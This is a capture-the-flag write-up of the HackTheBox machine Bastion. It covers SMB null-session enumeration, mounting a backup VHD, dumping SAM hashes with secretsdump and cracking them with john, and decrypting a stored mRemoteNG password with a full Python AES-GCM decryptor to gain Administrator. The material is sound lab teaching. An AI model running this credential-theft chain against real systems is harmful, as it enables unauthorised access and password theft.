Bastion

#Windows #Enumeration #VHD #SAM #mRemoteNG

Bastion is an easy-rated Windows machine from HackTheBox created by L4mpje. The machine is not complex, but it is noisy: the SMB share holds a full Windows image backup as a VHD (Virtual Hard Disk), so there is a lot of irrelevant content to wade through. In this post my IP is 10.10.14.76 and the target's IP is 10.129.136.29.

Gather Information

This step is always the same: ping the machine to check that it is alive, then scan all ports with Nmap so nothing surprises us later.

Ping output: a TTL close to 128 suggests a Windows host.
Local Terminal
nmap -p- --open -T5 -v -n 10.129.136.29

There is plenty of interesting stuff here, but nothing on a web port; if there is a website, it is on a non-default port. Ports 135/139/445 (RPC and SMB), 22 (SSH, unusual on Windows) and 5985 (WinRM) stand out. Perhaps we can get into the machine through SMB.

Local Terminal
nmap -sC -sV -p 22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.129.136.29
Nmap sCV scan, part 1

Port 5985 does answer HTTP, but it is Microsoft's HTTPAPI serving WinRM rather than a website, and no hostname or domain is revealed.

Nmap sCV scan, part 2
Local Terminal
whatweb http://10.129.136.29:5985
Nothing relevant
Local Terminal
whatweb http://10.129.136.29:47001
404 Again

So there is no website to work with. SMB is the obvious next target, so let's see what it exposes.

Local Terminal
crackmapexec smb 10.129.136.29
A good sign for us.
Local Terminal
smbclient -L 10.129.136.29 -N
Shares available on the machine

Always try a null session first.

Local Terminal
smbmap -H 10.129.136.29 -u 'null'
Share permissions

There is a share (Backups) that the guest/null user can both read and write. That is a good opportunity to explore the machine in more detail.

Local Terminal
smbclient //10.129.136.29/Backups -N

And we are in; the prompt is now the smbclient session on the Backups share rather than the local terminal.

Terminal Backups
get note.txt
exit
Local Terminal
cat note.txt
Takeaway from the note: since the share is reachable over SMB at any time, there is no need to download the whole backup; work on it in place.

So we map the Backups share as a network drive from Windows and browse it there. Log in with user null and a blank password.

Local Terminal
net use Z: \\10.129.136.29\Backups
tree Z:\ /f
Entire contents of the Backups share

Weaponization

There are two .vhd (Virtual Hard Disk) files. They are worth reviewing because they are backups of the target machine, so they may contain files related to passwords. I am working from Windows here, so the tools differ; the Linux equivalent is in the "Mount VHD on Linux" section at the end.

Open Disk Management, then: Action > Attach VHD

  • In the Attach Virtual Hard Disk dialog, enter Z:\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd and tick Read-only so the backup is not modified.

Searching the attached disk turns up no flag, but the backup is still useful: it contains the SAM and SYSTEM registry hives. Note that Disk Management gives the attached VHD its own drive letter; the commands below use Z: as the author wrote them, so substitute the letter your VHD received. Go to that drive > Windows > System32 > config

Content of the location

Disk Mounted!

Local Terminal Z:\
cd Z:\Windows\System32\config
copy SYSTEM …\Bastion\content
copy SAM …\Bastion\content

With SYSTEM and SAM copied to the local machine, return to your own system to process them offline.

Local Terminal
cd …\Bastion\content
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Output of impacket-secretsdump

Exploitation

Create a file called data (vi data) and save the hashes captured by the previous command into it, one secretsdump line per user.

“data” file’s content
Local Terminal
crackmapexec smb 10.129.136.29 -u "Administrator" -H "31d6cfe0d16ae931b73c59d7e0c089c0"
crackmapexec reports the hash as valid. Note, though, that 31d6cfe0d16ae931b73c59d7e0c089c0 is the well-known NT hash of an empty password: it tells us the Administrator account in the backup had no password set, and it does not give us a usable Administrator login on the live machine. The hash worth cracking is L4mpje's.
Local Terminal
john --wordlist=/usr/share/wordlists/rockyou.txt data --format=NT
john cracks one hash: L4mpje:bureaulampje
Local Terminal
crackmapexec smb 10.129.136.29 -u 'L4mpje' -p 'bureaulampje'
It definitely works: we can log in as L4mpje with password bureaulampje. Since port 22 is open, SSH is the simplest way in.
Local Terminal
ssh L4mpje@10.129.136.29
ipconfig output on 10.129.136.29

We are in; the prompt is now a shell on the target as L4mpje.

Target L4mpje
cd Desktop
dir
type user.txt
With that, we have the first flag.

Privilege Escalation

Target L4mpje
cd C:\Users\Administrator
Access denied: we are not Administrator.

First, always check which privileges the current account holds.

Target L4mpje
whoami /priv
Neither of the two privileges listed is a usual escalation vector. Let's check group membership.
Target L4mpje
whoami /all
Command output, nothing of interest.
Target L4mpje
systeminfo
Nothing useful.
Target L4mpje
tasklist
Nothing useful.
Target L4mpje
cd C:\
dir
At this point the best option is to browse the directories one by one.
Target L4mpje
dir "C:\Program Files\"

You can also type dir PROGRA~1: Windows 8.3 short names abbreviate the first (~1) folder whose name starts with PROGRA, so there is no need to quote the space in Program Files.

Content of "Program Files"
Target L4mpje
dir PROGRA~2
Program Files (x86)

There is a folder with an unusual name: mRemoteNG, a remote connection manager. Searching for "mRemoteNG exploit" leads to https://ethicalhackingguru.com/how-to-exploit-remote-connection-managers/, which describes a Python script that decrypts the passwords mRemoteNG stores in its connections file, confCons.xml, located at C:\Users\<UserName>\AppData\Roaming\mRemoteNG\. The Password attribute in that file is not a hash but an encrypted blob, so there is nothing to crack: copy that value and hand it to the tool.

Target L4mpje
cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG\
dir
Target L4mpje
type confCons.xml

Save the encrypted value and close the L4mpje session. Encrypted password:

aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

Download the tool from https://github.com/kmahyyg/mremoteng-decrypt in a fresh local terminal (called "LocalTerm" below).

Local Terminal
cd …/Bastion/Content
git clone https://github.com/kmahyyg/mremoteng-decrypt
cd mremoteng-decrypt
Usage
Local Terminal
python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Decrypted password for Administrator: thXLHM96BeKL0ER2
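What the decrypt script does with that value, as an added example (my code, not the post's and not the kmahyyg tool): the Password attribute is base64 of salt, nonce, AES-256-GCM ciphertext and tag; the key is derived from the master password with PBKDF2-HMAC-SHA1 (1000 iterations); the salt doubles as the GCM associated data; and mRemoteNG ships with the default master password mR3m, which is why a confCons.xml with no custom master password decrypts with no secret at all. AES and GCM are written out in pure Python so it runs on the standard library alone; that is for readability and offline use, not a recommendation for production code.

```python
import base64
import hashlib
import hmac

def _gf_mul(a, b):  # multiply in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1
    r = 0
    while b:
        if b & 1: r ^= a
        a = ((a << 1) ^ 0x11B) if a & 0x80 else a << 1
        b >>= 1
    return r

def _sbox_entry(x):  # S-box: multiplicative inverse (x^254, so 0 stays 0), then the affine map
    inv = 1
    for _ in range(254):
        inv = _gf_mul(inv, x)
    s = inv
    for i in range(1, 5):
        s ^= ((inv << i) | (inv >> (8 - i))) & 0xFF
    return s ^ 0x63
SBOX = [_sbox_entry(x) for x in range(256)]

def _expand_key(key):  # FIPS-197 key schedule; 16/24/32-byte key -> Nr+1 round keys of 16 bytes
    nk = len(key) // 4
    w = [list(key[i:i + 4]) for i in range(0, len(key), 4)]
    rcon = 1
    for i in range(nk, 4 * (nk + 7)):
        t = w[i - 1][:]
        if i % nk == 0:                       # RotWord, SubWord, Rcon
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = _gf_mul(rcon, 2)
        elif nk > 6 and i % nk == 4:          # extra SubWord for AES-256
            t = [SBOX[b] for b in t]
        w.append([w[i - nk][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(nk + 7)]

def _encrypt_block(rk, block):  # one block; state index r + 4*c holds row r, column c
    s = [b ^ k for b, k in zip(block, rk[0])]
    for rnd in range(1, len(rk)):
        s = [SBOX[b] for b in s]                                            # SubBytes
        s = [s[r + 4 * ((c + r) % 4)] for c in range(4) for r in range(4)]  # ShiftRows
        if rnd != len(rk) - 1:                                              # MixColumns
            m = []
            for c in range(4):
                a0, a1, a2, a3 = s[4 * c:4 * c + 4]
                m += [_gf_mul(a0, 2) ^ _gf_mul(a1, 3) ^ a2 ^ a3, a0 ^ _gf_mul(a1, 2) ^ _gf_mul(a2, 3) ^ a3,
                      a0 ^ a1 ^ _gf_mul(a2, 2) ^ _gf_mul(a3, 3), _gf_mul(a0, 3) ^ a1 ^ a2 ^ _gf_mul(a3, 2)]
            s = m
        s = [b ^ k for b, k in zip(s, rk[rnd])]                             # AddRoundKey
    return bytes(s)

def _gf128_mul(x, y):  # GF(2^128) multiply in GCM's bit-reflected convention, R = 0xE1 || 0^120
    z, v = 0, x
    for i in range(128):
        if (y >> (127 - i)) & 1: z ^= v
        v = ((v >> 1) ^ (0xE1 << 120)) if v & 1 else v >> 1
    return z

def _ghash(h, data):  # data must already be a multiple of 16 bytes
    y = 0
    for i in range(0, len(data), 16):
        y = _gf128_mul(y ^ int.from_bytes(data[i:i + 16], "big"), h)
    return y

def aes_gcm_decrypt(key, nonce, ciphertext, tag, aad=b""):
    """NIST SP 800-38D: verify the tag first, then run CTR. Any nonce length is accepted."""
    pad = lambda b: b + bytes(-len(b) % 16)
    rk = _expand_key(key)
    h = int.from_bytes(_encrypt_block(rk, bytes(16)), "big")
    if len(nonce) == 12:
        j0 = int.from_bytes(nonce + b"\x00\x00\x00\x01", "big")
    else:   # mRemoteNG uses a 16-byte nonce: J0 = GHASH(nonce || 0^64 || [bitlen(nonce)]_64)
        j0 = _ghash(h, pad(nonce) + (8 * len(nonce)).to_bytes(16, "big"))
    s = _ghash(h, pad(aad) + pad(ciphertext)
               + (8 * len(aad)).to_bytes(8, "big") + (8 * len(ciphertext)).to_bytes(8, "big"))
    expected = (int.from_bytes(_encrypt_block(rk, j0.to_bytes(16, "big")), "big") ^ s).to_bytes(16, "big")
    if not hmac.compare_digest(expected, tag):
        raise ValueError("GCM tag mismatch: wrong master password or corrupted blob")
    out, ctr = bytearray(), j0
    for i in range(0, len(ciphertext), 16):
        ctr = (ctr & ~0xFFFFFFFF) | ((ctr + 1) & 0xFFFFFFFF)               # inc32
        ks = _encrypt_block(rk, ctr.to_bytes(16, "big"))
        out += bytes(a ^ b for a, b in zip(ciphertext[i:i + 16], ks))
    return bytes(out)

def decrypt_mremoteng(blob_b64, master_password="mR3m"):
    """Password attribute = base64(salt[16] | nonce[16] | ciphertext | tag[16]); key = PBKDF2-HMAC-SHA1
    (master password, salt, 1000 rounds, 32 bytes); the salt is also the AAD. "mR3m" is the default."""
    raw = base64.b64decode(blob_b64)
    salt, nonce, ct, tag = raw[:16], raw[16:32], raw[32:-16], raw[-16:]
    key = hashlib.pbkdf2_hmac("sha1", master_password.encode(), salt, 1000, dklen=32)
    return aes_gcm_decrypt(key, nonce, ct, tag, aad=salt).decode("utf-8")

# The Password value copied out of the target's confCons.xml (quoted in the post above).
BASTION_BLOB = "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

if __name__ == "__main__":
    print(decrypt_mremoteng(BASTION_BLOB))
```

Run it with python3 and it prints the Administrator password. A wrong master password is caught by the tag check rather than producing garbage, so a confCons.xml that is protected by a real master password has to be brute-forced through that same check, one PBKDF2 derivation per guess.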
Local Terminal
crackmapexec smb 10.129.136.29 -u 'Administrator' -p 'thXLHM96BeKL0ER2'
Local Terminal
ssh Administrator@10.129.136.29

Now LocalTerm is a shell on the target as Administrator.

Target Administrator
cd Desktop
dir
type root.txt

Mount VHD on Linux

Some background first: rmmod is the Linux command that unloads a kernel module, modprobe loads one, and qemu-nbd (apt install qemu-utils) exports a QEMU disk image as a block device over the NBD protocol, which is how we attach the VHD without a VM. The commands below assume the Backups share is already mounted under /mnt/smb.


Local Terminal
mkdir /mnt/vhd
modprobe nbd                         # load the network block device module
qemu-nbd -r -c /dev/nbd0 "/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"
mount -o ro /dev/nbd0 /mnt/vhd
cd /mnt/vhd
ls -la
From here on the steps are the same as on Windows: copy SAM and SYSTEM out of Windows/System32/config and run secretsdump. If the image carries a partition table, the filesystem lives on /dev/nbd0p1 rather than /dev/nbd0; load the module with modprobe nbd max_part=8 so the partition devices appear.
